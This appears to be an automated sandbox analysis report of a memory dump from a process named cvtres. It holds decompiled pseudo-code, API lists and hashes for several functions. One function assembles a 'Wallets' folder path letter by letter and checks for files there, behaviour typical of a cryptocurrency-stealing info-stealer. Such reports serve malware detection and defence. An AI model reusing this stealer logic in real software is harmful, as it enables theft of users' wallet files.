                                                                    • Instruction Fuzzy Hash: E7410CB1E00218AFDB219FA1DC88EEE7BBCFB06755F10003AF919A7191D7745944CB59
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00412FC2 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 105libraryloaderstringCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 83%
                                                                    			E00412FC2(void* __ebx, void* __edx, void* __edi, void* __esi) {
				signed int _v8;
				char _v5008;
				CHAR* _v5012;
				signed int _t13;
				CHAR* _t15;
				void* _t16;
				struct HINSTANCE__* _t31;
				void* _t43;
				CHAR* _t45;
				signed int _t49;
				intOrPtr _t55;
				intOrPtr _t56;
				intOrPtr _t57;
				intOrPtr _t58;
				intOrPtr _t59;
				intOrPtr _t60;

				_t46 = __esi;
				_t44 = __edi;
				_t43 = __edx;
				_t39 = __ebx;
				E0042E300(0x1390);
				_t13 =  *0x443674; // 0x393162b1
				_v8 = _t13 ^ _t49;
				_t15 =  *0x445fe0; // 0x4c99228
				_v5012 = _t15;
				if(_t15 == 0) {
					_t16 = 0;
				} else {
					_push(__ebx);
					_push(__esi);
					_push(__edi);
					_t45 = "PATH";
					GetEnvironmentVariableA(_t45, 0x446f38, 0xffff);
					E00426300( &_v5008, 0, 0x1388);
					lstrcatA( &_v5008, 0x446f38);
					lstrcatA( &_v5008, ";");
					lstrcatA( &_v5008, _v5012);
					SetEnvironmentVariableA(_t45,  &_v5008);
					E00426300( &_v5008, 0, 0x1388);
					_t31 = LoadLibraryA( *0x4460bc);
					 *0x446240 = _t31;
					if(_t31 != 0) {
						 *0x446234 = GetProcAddress(_t31,  *0x445cb0);
						 *0x446254 = GetProcAddress( *0x446240,  *0x446030);
						 *0x446200 = GetProcAddress( *0x446240,  *0x445bd8);
						 *0x446228 = GetProcAddress( *0x446240,  *0x445b24);
						 *0x446244 = GetProcAddress( *0x446240,  *0x4461b8);
						 *0x446220 = GetProcAddress( *0x446240,  *0x445d48);
					}
					_t55 =  *0x446234; // 0x0
					if(_t55 == 0) {
						L10:
						_t16 = 0;
					} else {
						_t56 =  *0x446254; // 0x0
						if(_t56 == 0) {
							goto L10;
						} else {
							_t57 =  *0x446200; // 0x0
							if(_t57 == 0) {
								goto L10;
							} else {
								_t58 =  *0x446244; // 0x0
								if(_t58 == 0) {
									goto L10;
								} else {
									_t59 =  *0x446220; // 0x0
									if(_t59 == 0) {
										goto L10;
									} else {
										_t60 =  *0x446228; // 0x0
										if(_t60 == 0) {
											goto L10;
										} else {
											_t16 = 1;
										}
									}
								}
							}
						}
					}
					_pop(_t44);
					_pop(_t46);
					_pop(_t39);
				}
				return E0041DA9B(_t16, _t39, _v8 ^ _t49, _t43, _t44, _t46);
			}



















                                                                    0x00412fc2
                                                                    0x00412fc2
                                                                    0x00412fc2
                                                                    0x00412fc2
                                                                    0x00412fca
                                                                    0x00412fcf
                                                                    0x00412fd6
                                                                    0x00412fd9
                                                                    0x00412fde
                                                                    0x00412fe6
                                                                    0x0041314b
                                                                    0x00412fec
                                                                    0x00412fec
                                                                    0x00412fed
                                                                    0x00412fee
                                                                    0x00412ffa
                                                                    0x00413000
                                                                    0x00413015
                                                                    0x00413025
                                                                    0x00413037
                                                                    0x0041304a
                                                                    0x00413058
                                                                    0x00413069
                                                                    0x00413077
                                                                    0x0041307d
                                                                    0x00413084
                                                                    0x0041309d
                                                                    0x004130b4
                                                                    0x004130cb
                                                                    0x004130e2
                                                                    0x004130f9
                                                                    0x0041310a
                                                                    0x0041310a
                                                                    0x0041310f
                                                                    0x00413115
                                                                    0x00413144
                                                                    0x00413144
                                                                    0x00413117
                                                                    0x00413117
                                                                    0x0041311d
                                                                    0x00000000
                                                                    0x0041311f
                                                                    0x0041311f
                                                                    0x00413125
                                                                    0x00000000
                                                                    0x00413127
                                                                    0x00413127
                                                                    0x0041312d
                                                                    0x00000000
                                                                    0x0041312f
                                                                    0x0041312f
                                                                    0x00413135
                                                                    0x00000000
                                                                    0x00413137
                                                                    0x00413137
                                                                    0x0041313d
                                                                    0x00000000
                                                                    0x0041313f
                                                                    0x00413141
                                                                    0x00413141
                                                                    0x0041313d
                                                                    0x00413135
                                                                    0x0041312d
                                                                    0x00413125
                                                                    0x0041311d
                                                                    0x00413146
                                                                    0x00413147
                                                                    0x00413148
                                                                    0x00413148
                                                                    0x00413158

                                                                    APIs
                                                                    • GetEnvironmentVariableA.KERNEL32(PATH,00446F38,0000FFFF,04C98480,00000104,?,?,004132A6,?,?,?,?,?,?), ref: 00413000
                                                                    • _memset.LIBCMT ref: 00413015
                                                                    • lstrcatA.KERNEL32(?,00446F38,?,?,?,?,?,?,?,?,?), ref: 00413025
                                                                    • lstrcatA.KERNEL32(?,0043EAA0,?,?,?,?,?,?,?,?,?), ref: 00413037
                                                                    • lstrcatA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 0041304A
                                                                    • SetEnvironmentVariableA.KERNEL32(PATH,?,?,?,?,?,?,?,?,?,?), ref: 00413058
                                                                    • _memset.LIBCMT ref: 00413069
                                                                    • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00413077
                                                                    • GetProcAddress.KERNEL32(00000000), ref: 00413091
                                                                    • GetProcAddress.KERNEL32 ref: 004130A8
                                                                    • GetProcAddress.KERNEL32 ref: 004130BF
                                                                    • GetProcAddress.KERNEL32 ref: 004130D6
                                                                    • GetProcAddress.KERNEL32 ref: 004130ED
                                                                    • GetProcAddress.KERNEL32 ref: 00413104
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AddressProc$lstrcat$EnvironmentVariable_memset$LibraryLoad
                                                                    • String ID: PATH
                                                                    • API String ID: 3772005587-1036084923
                                                                    • Opcode ID: 9df7bf8e8ec9dd19cbb5c4378077d5e82aab42e83cfde72de5ef2daa61efcc62
                                                                    • Instruction ID: 748926a35c7f1f89fcb44e6c6686cef8338ece62dccfaa37fe4aba263accd245
                                                                    • Opcode Fuzzy Hash: 9df7bf8e8ec9dd19cbb5c4378077d5e82aab42e83cfde72de5ef2daa61efcc62
                                                                    • Instruction Fuzzy Hash: 9D415D79901214FFDB11AF64FC4989ABBB9FB0BB0270244B6F90592231DB754A84DF1E
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004085DE Relevance: 25.6, APIs: 17, Instructions: 118memorystringCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 25%
                                                                    			E004085DE(void* __ebx, void* __eflags, CHAR* _a4) {
				char _v8;
				signed int _v12;
				char _v16;
				CHAR* __edi;
				short _t17;
				void* _t20;
				signed int _t21;
				void* _t24;
				void* _t28;
				void* _t29;
				void* _t33;
				void* _t34;

				lstrcatA(HeapAlloc(GetProcessHeap(), 0, 0xea60), _a4);
				_t17 = 0x2c;
				_v8 = _t17;
				_t20 = E0041E87C(__ebx, _t28, _t29, _t15,  &_v8,  &_v16);
				_t30 = _t20;
				_t34 = _t33 + 0xc;
				if(_t20 == 0) {
					return _t20;
				} else {
					_v12 = _v12 & 0x00000000;
					_push(__ebx);
					while(1) {
						_t21 = _v12;
						if(_t21 > 0xb) {
							goto L22;
						}
						switch( *((intOrPtr*)(_t21 * 4 +  &M0040875A))) {
							case 0:
								 *0x4442d8 = 1;
								goto L22;
							case 1:
								_push(__esi);
								_push(__edi);
								if( *0x446458() == 0) {
									 *0x4465e4 = 1;
								}
								goto L22;
							case 2:
								_push(__esi);
								_push(__edi);
								if( *0x446458() == 0) {
									 *0x4465e5 = 1;
								}
								goto L22;
							case 3:
								_push(__esi);
								_push(__edi);
								if( *0x446458() == 0) {
									 *0x4465e6 = 1;
								}
								goto L22;
							case 4:
								_push(__esi);
								_push(__edi);
								if( *0x446458() == 0) {
									 *0x4465ec = 1;
								}
								goto L22;
							case 5:
								__eax = GetProcessHeap();
								__eax = HeapAlloc(__eax, 0, __ebx);
								 *0x4461e8 = __eax;
								goto L21;
							case 6:
								_push(__esi);
								_push(__edi);
								if( *0x446458() == 0) {
									 *0x4465e9 = 1;
								}
								goto L22;
							case 7:
								_push(__esi);
								_push(__edi);
								if( *0x446458() == 0) {
									 *0x4465ea = 1;
								}
								goto L22;
							case 8:
								_push(__esi);
								_push(__edi);
								if( *0x446458() == 0) {
									 *0x4465eb = 1;
								}
								goto L22;
							case 9:
								goto L22;
							case 0xa:
								__eax = GetProcessHeap();
								__eax = HeapAlloc(__eax, 0, __ebx);
								 *0x4461e0 = __eax;
								L21:
								__eax = lstrcatA(__eax, __edi);
								goto L22;
						}
						L22:
						_t24 = E0041E87C(0xf423f, _t28, _t30, 0,  &_v8,  &_v16);
						_t34 = _t34 + 0xc;
						_v12 = _v12 + 1;
						_t30 = _t24;
						if(_t24 == 0) {
							return _t24;
						}
					}
				}
			}















                                                                    0x00408600
                                                                    0x00408608
                                                                    0x00408609
                                                                    0x00408616
                                                                    0x0040861b
                                                                    0x0040861d
                                                                    0x00408622
                                                                    0x00408758
                                                                    0x00408628
                                                                    0x00408628
                                                                    0x0040862c
                                                                    0x00408637
                                                                    0x00408637
                                                                    0x0040863d
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00408643
                                                                    0x00000000
                                                                    0x0040864a
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00408656
                                                                    0x00408657
                                                                    0x00408660
                                                                    0x00408666
                                                                    0x00408666
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00408672
                                                                    0x00408673
                                                                    0x0040867c
                                                                    0x00408682
                                                                    0x00408682
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040868e
                                                                    0x0040868f
                                                                    0x00408698
                                                                    0x0040869e
                                                                    0x0040869e
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004086aa
                                                                    0x004086ab
                                                                    0x004086b4
                                                                    0x004086b6
                                                                    0x004086b6
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004086c5
                                                                    0x004086cc
                                                                    0x004086d2
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004086d9
                                                                    0x004086da
                                                                    0x004086e3
                                                                    0x004086e5
                                                                    0x004086e5
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004086ee
                                                                    0x004086ef
                                                                    0x004086f8
                                                                    0x004086fa
                                                                    0x004086fa
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00408703
                                                                    0x00408704
                                                                    0x0040870d
                                                                    0x0040870f
                                                                    0x0040870f
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040871b
                                                                    0x00408722
                                                                    0x00408728
                                                                    0x0040872d
                                                                    0x0040872f
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00408735
                                                                    0x0040873f
                                                                    0x00408744
                                                                    0x00408747
                                                                    0x0040874a
                                                                    0x0040874e
                                                                    0x00000000
                                                                    0x00408754
                                                                    0x0040874e
                                                                    0x00408637

                                                                    APIs
                                                                    • GetProcessHeap.KERNEL32(00000000,0000EA60), ref: 004085ED
                                                                    • HeapAlloc.KERNEL32(00000000), ref: 004085F4
                                                                    • lstrcatA.KERNEL32(00000000,?), ref: 00408600
                                                                    • _strtok_s.LIBCMT ref: 00408616
                                                                    • StrCmpCA.SHLWAPI(00000000,0043EAB0), ref: 00408658
                                                                    • StrCmpCA.SHLWAPI(00000000,0043EAB0), ref: 00408674
                                                                    • StrCmpCA.SHLWAPI(00000000,0043EAB0), ref: 00408690
                                                                    • StrCmpCA.SHLWAPI(00000000,0043EAB0), ref: 004086AC
                                                                    • GetProcessHeap.KERNEL32(00000000), ref: 004086C5
                                                                    • HeapAlloc.KERNEL32(00000000), ref: 004086CC
                                                                    • StrCmpCA.SHLWAPI(00000000,0043EAB0), ref: 004086DB
                                                                    • StrCmpCA.SHLWAPI(00000000,0043EAB0), ref: 004086F0
                                                                    • StrCmpCA.SHLWAPI(00000000,0043EAB0), ref: 00408705
                                                                    • GetProcessHeap.KERNEL32(00000000), ref: 0040871B
                                                                    • HeapAlloc.KERNEL32(00000000), ref: 00408722
                                                                    • lstrcatA.KERNEL32(00000000,00000000), ref: 0040872F
                                                                    • _strtok_s.LIBCMT ref: 0040873F
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Heap$AllocProcess$_strtok_slstrcat
                                                                    • String ID:
                                                                    • API String ID: 4140380964-0
                                                                    • Opcode ID: 9fe15ea3cd8cb55b69d4353edd269bc31d074beb1793045d57e231c3bfcf8b4b
                                                                    • Instruction ID: 1ab5c5e10588874a8b03f28668edbbbb0e50cbb0f25720013d80549cebb40681
                                                                    • Opcode Fuzzy Hash: 9fe15ea3cd8cb55b69d4353edd269bc31d074beb1793045d57e231c3bfcf8b4b
                                                                    • Instruction Fuzzy Hash: FE41BD38504240AAEB019B61AD8CFAB3F7C9B17795F21003AF541A7295FF788582972F
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0040C423 Relevance: 24.4, APIs: 16, Instructions: 359stringCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 87%
                                                                    			E0040C423(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t148;
				intOrPtr _t152;
				void* _t166;
				void* _t171;
				void* _t178;
				void* _t183;
				WCHAR* _t184;
				signed char _t185;
				CHAR* _t210;
				CHAR* _t217;
				intOrPtr* _t228;
				void* _t230;
				void* _t241;
				intOrPtr _t262;
				void* _t284;
				void* _t322;
				void* _t323;
				intOrPtr _t324;
				void* _t325;

				_t312 = __esi;
				_t298 = __edi;
				_t252 = __ebx;
				_push(0x260);
				E0042083E(E00434A31, __ebx, __edi, __esi);
				 *((intOrPtr*)(_t322 - 0x258)) =  *((intOrPtr*)(_t322 + 8));
				 *((intOrPtr*)(_t322 - 4)) = 0;
				 *((intOrPtr*)(_t322 - 0x120)) = 0xf;
				 *((intOrPtr*)(_t322 - 0x124)) = 0;
				 *((char*)(_t322 - 0x134)) = 0;
				 *((char*)(_t322 - 4)) = 3;
				_t327 =  *((intOrPtr*)(_t322 + 0xc));
				if( *((intOrPtr*)(_t322 + 0xc)) == 0) {
					_push(0x1a);
				} else {
					_push(0x1c);
				}
				E00404331(_t322 - 0x134, E00416617(_t252, _t298, _t312));
				_push(_t322 - 0x134);
				_push(_t322 - 0x1dc);
				_t299 = _t322 + 0x10;
				_t148 = E0040C1B7(_t252, _t322 + 0x10, _t312, _t327);
				_t324 = _t323 - 0x14;
				 *((char*)(_t322 - 4)) = 4;
				_t297 = _t322 + 0x48;
				 *((intOrPtr*)(_t322 - 0x25c)) = _t324;
				E0040D66C(_t148, _t148, _t324, _t322 + 0x48);
				E004162AB(_t322 - 0x26c, _t322 + 0x10, _t312, _t327);
				 *((char*)(_t322 - 4)) = 6;
				E00404354(_t322 - 0x1dc, 1, 0);
				_t152 =  *((intOrPtr*)(_t322 - 0x268));
				_t262 =  *((intOrPtr*)(_t322 - 0x26c));
				 *((intOrPtr*)(_t322 - 0x25c)) = _t152;
				 *((intOrPtr*)(_t322 - 0x254)) = _t262;
				_t328 = _t262 - _t152;
				if(_t262 != _t152) {
					do {
						E0040D38B(_t322 - 0x16c,  *((intOrPtr*)(_t322 - 0x254)));
						 *((char*)(_t322 - 4)) = 7;
						_t166 = E0041607C(_t322 - 0x16c, _t297, _t322 - 0x230);
						_push(_t322 - 0x134);
						_push(_t322 - 0x214);
						 *((char*)(_t322 - 4)) = 8;
						E0040C1B7(0, _t322 + 0x10, _t166, _t328);
						 *((char*)(_t322 - 4)) = 9;
						_t171 = E004046CE(_t166, _t322 - 0x24c);
						 *((char*)(_t322 - 4)) = 0xa;
						 *((intOrPtr*)(_t322 - 0x1ac)) = 0xf;
						 *((intOrPtr*)(_t322 - 0x1b0)) = 0;
						 *((char*)(_t322 - 0x1c0)) = 0;
						E004042ED(_t322 - 0x1c0, _t171);
						E00404354(_t322 - 0x24c, 1, 0);
						E00404354(_t322 - 0x214, 1, 0);
						 *((char*)(_t322 - 4)) = 0xe;
						E00404354(_t322 - 0x230, 1, 0);
						_t178 = E0041607C(_t322 - 0x16c, _t297, _t322 - 0x150);
						_push(_t322 - 0x134);
						_push(_t322 - 0x1a4);
						 *((char*)(_t322 - 4)) = 0xf;
						E0040C1B7(0, _t322 + 0x10, _t178, _t328);
						 *((char*)(_t322 - 4)) = 0x10;
						_t183 = E004046CE(_t178, _t322 - 0x188);
						 *((char*)(_t322 - 4)) = 0x11;
						_t184 = E004160E8(_t183, _t322 - 0x1f8);
						if(_t184[0xa] >= 8) {
							_t184 =  *_t184;
						}
						_t185 = GetFileAttributesW(_t184);
						if(_t185 == 0xffffffff) {
							L8:
							 *((intOrPtr*)(_t322 - 0x250)) = 0;
						} else {
							 *((intOrPtr*)(_t322 - 0x250)) = 1;
							if((_t185 & 0x00000010) != 0) {
								goto L8;
							}
						}
						E0040C148(0, _t322 - 0x1f8, 1);
						E00404354(_t322 - 0x188, 1, 0);
						E00404354(_t322 - 0x1a4, 1, 0);
						 *((char*)(_t322 - 4)) = 0xe;
						E00404354(_t322 - 0x150, 1, 0);
						if( *((intOrPtr*)(_t322 - 0x250)) != 0) {
							 *((intOrPtr*)( *((intOrPtr*)(_t322 - 0x258)) + 0x1c)) =  *((intOrPtr*)( *((intOrPtr*)(_t322 - 0x258)) + 0x1c)) + 1;
						}
						E00426300(_t322 - 0x118, 0, 0x104);
						_t325 = _t324 + 0xc;
						lstrcatA(_t322 - 0x118, 0x43c8e0);
						lstrcatA(_t322 - 0x118, "W");
						lstrcatA(_t322 - 0x118, "a");
						lstrcatA(_t322 - 0x118, "l");
						lstrcatA(_t322 - 0x118, "l");
						lstrcatA(_t322 - 0x118, "e");
						lstrcatA(_t322 - 0x118, "t");
						lstrcatA(_t322 - 0x118, "s");
						lstrcatA(_t322 - 0x118, 0x43c8e0);
						_t210 =  *(_t322 + 0x2c);
						if( *((intOrPtr*)(_t322 + 0x40)) < 0x10) {
							_t210 = _t322 + 0x2c;
						}
						lstrcatA(_t322 - 0x118, _t210);
						lstrcatA(_t322 - 0x118, 0x43c8e0);
						_t217 = E0041607C(_t322 - 0x16c, _t297, _t322 - 0x150);
						 *((char*)(_t322 - 4)) = 0x12;
						_t335 = _t217[0x14] - 0x10;
						if(_t217[0x14] >= 0x10) {
							_t217 =  *_t217;
						}
						lstrcatA(_t322 - 0x118, _t217);
						 *((char*)(_t322 - 4)) = 0xe;
						E00404354(_t322 - 0x150, 1, 0);
						 *((intOrPtr*)(_t322 - 0x250)) = E0041607C(_t322 - 0x16c, _t297, _t322 - 0x188);
						_push(_t322 - 0x134);
						_push(_t322 - 0x1a4);
						 *((char*)(_t322 - 4)) = 0x13;
						_t284 = E0040C1B7(0, _t322 + 0x10, 1, _t335);
						 *((char*)(_t322 - 4)) = 0x14;
						_t228 = E004046CE( *((intOrPtr*)(_t322 - 0x250)), _t322 - 0x150);
						 *((char*)(_t322 - 4)) = 0x15;
						_t336 =  *((intOrPtr*)(_t228 + 0x14)) - 0x10;
						if( *((intOrPtr*)(_t228 + 0x14)) >= 0x10) {
							_t228 =  *_t228;
						}
						_t230 = E00426ED0(E00416388(_t284, _t228), _t297, 0x3e8, 0);
						E00404354(_t322 - 0x150, 1, 0);
						E00404354(_t322 - 0x1a4, 1, 0);
						 *((char*)(_t322 - 4)) = 0xe;
						E00404354(_t322 - 0x188, 1, 0);
						 *0x4461f8 =  *0x4461f8 + _t230;
						 *((intOrPtr*)(_t322 - 0x250)) = E0041607C(_t322 - 0x16c, _t297, _t322 - 0x188);
						_push(_t322 - 0x134);
						_push(_t322 - 0x1a4);
						 *((char*)(_t322 - 4)) = 0x16;
						E0040C1B7(0, _t322 + 0x10, 1, _t336);
						 *((char*)(_t322 - 4)) = 0x17;
						_t241 = E004046CE( *((intOrPtr*)(_t322 - 0x250)), _t322 - 0x150);
						 *((char*)(_t322 - 4)) = 0x18;
						if( *((intOrPtr*)(_t241 + 0x14)) < 0x10) {
						}
						_t297 = _t322 - 0x118;
						E0041CE7C( *((intOrPtr*)( *((intOrPtr*)(_t322 - 0x258)) + 0x20)), _t322 - 0x118, 0, 2);
						_t324 = _t325 + 0xc;
						E00404354(_t322 - 0x150, 1, 0);
						E00404354(_t322 - 0x1a4, 1, 0);
						E00404354(_t322 - 0x188, 1, 0);
						E00404354(_t322 - 0x1c0, 1, 0);
						_t299 = 0;
						 *((char*)(_t322 - 4)) = 6;
						E0040C148(0, _t322 - 0x16c, 1);
						 *((intOrPtr*)(_t322 - 0x254)) =  *((intOrPtr*)(_t322 - 0x254)) + 0x1c;
					} while ( *((intOrPtr*)(_t322 - 0x254)) !=  *((intOrPtr*)(_t322 - 0x25c)));
				}
				_t153 =  *((intOrPtr*)(_t322 - 0x26c));
				if( *((intOrPtr*)(_t322 - 0x26c)) != 0) {
					E0040D51F(_t153,  *((intOrPtr*)(_t322 - 0x268)));
					_push( *((intOrPtr*)(_t322 - 0x26c)));
					E0041E1F1();
				}
				 *((intOrPtr*)(_t322 - 0x26c)) = 0;
				 *((intOrPtr*)(_t322 - 0x268)) = 0;
				 *((intOrPtr*)(_t322 - 0x264)) = 0;
				E00404354(_t322 - 0x134, 1, 0);
				E00404354(_t322 + 0x10, 1, 0);
				E00404354(_t322 + 0x2c, 1, 0);
				E00404354(_t322 + 0x48, 1, 0);
				return E00420888(0, _t299, 1);
			}






















                                                                    0x0040c423
                                                                    0x0040c423
                                                                    0x0040c423
                                                                    0x0040c423
                                                                    0x0040c42d
                                                                    0x0040c435
                                                                    0x0040c43d
                                                                    0x0040c440
                                                                    0x0040c44a
                                                                    0x0040c450
                                                                    0x0040c456
                                                                    0x0040c45a
                                                                    0x0040c45d
                                                                    0x0040c463
                                                                    0x0040c45f
                                                                    0x0040c45f
                                                                    0x0040c45f
                                                                    0x0040c472
                                                                    0x0040c47d
                                                                    0x0040c484
                                                                    0x0040c485
                                                                    0x0040c488
                                                                    0x0040c48d
                                                                    0x0040c490
                                                                    0x0040c496
                                                                    0x0040c499
                                                                    0x0040c4a3
                                                                    0x0040c4b0
                                                                    0x0040c4c0
                                                                    0x0040c4c4
                                                                    0x0040c4c9
                                                                    0x0040c4cf
                                                                    0x0040c4d5
                                                                    0x0040c4db
                                                                    0x0040c4e1
                                                                    0x0040c4e3
                                                                    0x0040c4e9
                                                                    0x0040c4f5
                                                                    0x0040c507
                                                                    0x0040c50b
                                                                    0x0040c518
                                                                    0x0040c51f
                                                                    0x0040c523
                                                                    0x0040c527
                                                                    0x0040c538
                                                                    0x0040c53c
                                                                    0x0040c541
                                                                    0x0040c54d
                                                                    0x0040c557
                                                                    0x0040c55d
                                                                    0x0040c563
                                                                    0x0040c571
                                                                    0x0040c57f
                                                                    0x0040c58d
                                                                    0x0040c591
                                                                    0x0040c5a3
                                                                    0x0040c5b0
                                                                    0x0040c5b7
                                                                    0x0040c5bb
                                                                    0x0040c5bf
                                                                    0x0040c5d0
                                                                    0x0040c5d4
                                                                    0x0040c5e0
                                                                    0x0040c5e4
                                                                    0x0040c5ed
                                                                    0x0040c5ef
                                                                    0x0040c5ef
                                                                    0x0040c5f2
                                                                    0x0040c5fb
                                                                    0x0040c60b
                                                                    0x0040c60b
                                                                    0x0040c5fd
                                                                    0x0040c5fd
                                                                    0x0040c609
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040c609
                                                                    0x0040c61b
                                                                    0x0040c62b
                                                                    0x0040c638
                                                                    0x0040c645
                                                                    0x0040c649
                                                                    0x0040c654
                                                                    0x0040c65c
                                                                    0x0040c65c
                                                                    0x0040c66c
                                                                    0x0040c671
                                                                    0x0040c681
                                                                    0x0040c693
                                                                    0x0040c6a5
                                                                    0x0040c6b7
                                                                    0x0040c6c9
                                                                    0x0040c6db
                                                                    0x0040c6ed
                                                                    0x0040c6ff
                                                                    0x0040c70d
                                                                    0x0040c717
                                                                    0x0040c71a
                                                                    0x0040c71c
                                                                    0x0040c71c
                                                                    0x0040c727
                                                                    0x0040c735
                                                                    0x0040c748
                                                                    0x0040c74d
                                                                    0x0040c751
                                                                    0x0040c755
                                                                    0x0040c757
                                                                    0x0040c757
                                                                    0x0040c761
                                                                    0x0040c76f
                                                                    0x0040c773
                                                                    0x0040c78a
                                                                    0x0040c796
                                                                    0x0040c79d
                                                                    0x0040c7a1
                                                                    0x0040c7ac
                                                                    0x0040c7ba
                                                                    0x0040c7be
                                                                    0x0040c7c3
                                                                    0x0040c7c7
                                                                    0x0040c7cb
                                                                    0x0040c7cd
                                                                    0x0040c7cd
                                                                    0x0040c7dd
                                                                    0x0040c7ec
                                                                    0x0040c7f9
                                                                    0x0040c806
                                                                    0x0040c80a
                                                                    0x0040c80f
                                                                    0x0040c827
                                                                    0x0040c833
                                                                    0x0040c83a
                                                                    0x0040c83e
                                                                    0x0040c842
                                                                    0x0040c857
                                                                    0x0040c85b
                                                                    0x0040c860
                                                                    0x0040c868
                                                                    0x0040c868
                                                                    0x0040c87b
                                                                    0x0040c883
                                                                    0x0040c888
                                                                    0x0040c893
                                                                    0x0040c8a0
                                                                    0x0040c8ad
                                                                    0x0040c8ba
                                                                    0x0040c8c0
                                                                    0x0040c8c8
                                                                    0x0040c8cc
                                                                    0x0040c8d1
                                                                    0x0040c8de
                                                                    0x0040c4e9
                                                                    0x0040c8ea
                                                                    0x0040c8f2
                                                                    0x0040c8fa
                                                                    0x0040c8ff
                                                                    0x0040c905
                                                                    0x0040c90a
                                                                    0x0040c916
                                                                    0x0040c91c
                                                                    0x0040c922
                                                                    0x0040c928
                                                                    0x0040c932
                                                                    0x0040c93c
                                                                    0x0040c946
                                                                    0x0040c952

                                                                    APIs
                                                                    • __EH_prolog3_GS.LIBCMT ref: 0040C42D
                                                                      • Part of subcall function 004160E8: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,?,00000000,?,?,?,0040888C,?,?,?), ref: 00416109
                                                                      • Part of subcall function 004160E8: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?,?,?,?,0040888C,?,?,?), ref: 0041613A
                                                                    • GetFileAttributesW.KERNEL32(00000000,?,?,00000001,00000000,00000001,00000000,00000001,00000000), ref: 0040C5F2
                                                                    • _memset.LIBCMT ref: 0040C66C
                                                                    • lstrcatA.KERNEL32(?,0043C8E0,?,00000001,00000000,?,00000260,0040CBE9,?,00000000), ref: 0040C681
                                                                    • lstrcatA.KERNEL32(?,0043EE50,?,00000260,0040CBE9,?,00000000), ref: 0040C693
                                                                    • lstrcatA.KERNEL32(?,0043EE54,?,00000260,0040CBE9,?,00000000), ref: 0040C6A5
                                                                    • lstrcatA.KERNEL32(?,0043EE58,?,00000260,0040CBE9,?,00000000), ref: 0040C6B7
                                                                    • lstrcatA.KERNEL32(?,0043EE58,?,00000260,0040CBE9,?,00000000), ref: 0040C6C9
                                                                    • lstrcatA.KERNEL32(?,0043EE5C,?,00000260,0040CBE9,?,00000000), ref: 0040C6DB
                                                                    • lstrcatA.KERNEL32(?,0043EE60,?,00000260,0040CBE9,?,00000000), ref: 0040C6ED
                                                                    • lstrcatA.KERNEL32(?,0043EE64,?,00000260,0040CBE9,?,00000000), ref: 0040C6FF
                                                                    • lstrcatA.KERNEL32(?,0043C8E0,?,00000260,0040CBE9,?,00000000), ref: 0040C70D
                                                                    • lstrcatA.KERNEL32(?,?,?,00000260,0040CBE9,?,00000000), ref: 0040C727
                                                                    • lstrcatA.KERNEL32(?,0043C8E0,?,00000260,0040CBE9,?,00000000), ref: 0040C735
                                                                    • lstrcatA.KERNEL32(?,00000000,?,?,00000260,0040CBE9,?,00000000), ref: 0040C761
                                                                      • Part of subcall function 00404354: _memmove.LIBCMT ref: 00404373
                                                                      • Part of subcall function 0041607C: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,0000000F,00000000,?,?,?,00410FD2,?), ref: 0041609F
                                                                      • Part of subcall function 0041607C: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000,?,?,?,00410FD2,?,?,?), ref: 004160C4
                                                                      • Part of subcall function 0040C1B7: __EH_prolog3.LIBCMT ref: 0040C1BE
                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0040C7DD
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: lstrcat$ByteCharMultiWide$AttributesFileH_prolog3H_prolog3_Unothrow_t@std@@@__ehfuncinfo$??2@_memmove_memset
                                                                    • String ID:
                                                                    • API String ID: 3439367336-0
                                                                    • Opcode ID: 0274dfba1bf51bd1badf710d2c8fda07160a0912f2fa417b9bfd3ab15c42fd7b
                                                                    • Instruction ID: 24416d1cd17568d800239b90898ace65257112f9d78cb955b0f0f831f8b3c306
                                                                    • Opcode Fuzzy Hash: 0274dfba1bf51bd1badf710d2c8fda07160a0912f2fa417b9bfd3ab15c42fd7b
